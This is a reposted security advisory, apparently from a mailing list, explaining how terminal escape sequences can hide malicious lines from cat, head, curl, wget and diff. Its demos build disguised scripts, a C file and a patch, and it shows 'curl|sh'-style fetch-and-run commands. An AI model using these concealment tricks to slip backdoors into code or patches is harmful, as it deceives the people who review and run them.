s/party/hack like it's 1999

Credit: up201407890
Risk: Low
Local: Yes
Remote: No

Federico Bento <up201407890 () alunos dcc fc up pt> So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?" http://www.openwall.com/lists/oss-security/2015/08/11/8 This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new. How it technically works: A terminal escape sequence is a special sequence of characters that is printed (like any other text). If the terminal understands the sequence, it won't display the character-sequence, but will perform some action. While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness. $ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice! $ ./backdoor.sh doing something evil! As you can see, our beloved 'cat' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that interprets escape sequences. $ head backdoor.sh #!/bin/bash echo doing something very nice! $ tail backdoor.sh #!/bin/bash echo doing something very nice! $ more backdoor.sh #!/bin/bash echo doing something very nice! It's not over yet! $ curl #!/bin/bash echo doing something very nice! $ wget -qO - #!/bin/bash echo doing something very nice! But if we pipe it into a shell... $ curl -s|sh doing something evil! $ wget -qO -|sh doing something evil! You might be thinking "If I opened that in my browser, I would detect it being malicious!" Well, think again... One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then. I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this. I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files... It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck. Here's another example with a .c file $ printf '#include <stdio.h>\n\nint main()\n{\ntprintf("doing something evil\n");\nt/*\033[2A\nt/* This simple program doesnt do much... */\ntprintf("doing something very nice\n");\ntreturn 0;\n}\n' > nice.c $ cat nice.c #include <stdio.h> int main() { /* This simple program doesnt do much... */ printf("doing something very nice\n"); return 0; } $ gcc nice.c $ ./a.out doing something evil doing something very nice 'diff' also interprets escape sequences and so do the resulting patches going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us. $ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1,4 +1,2 @@ #!/bin/bash -echo doing something very nice! +echo doing something very nice! $ diff -Naur backdoor.sh legit.sh > file.patch $ patch legit.sh -R file.patch $ chmod +x legit.sh $ ./legit.sh doing something evil! Hint: 'less' doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to 'less -r' just because there's no colored output. s/party/hack like it's 1999



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com


Back to Top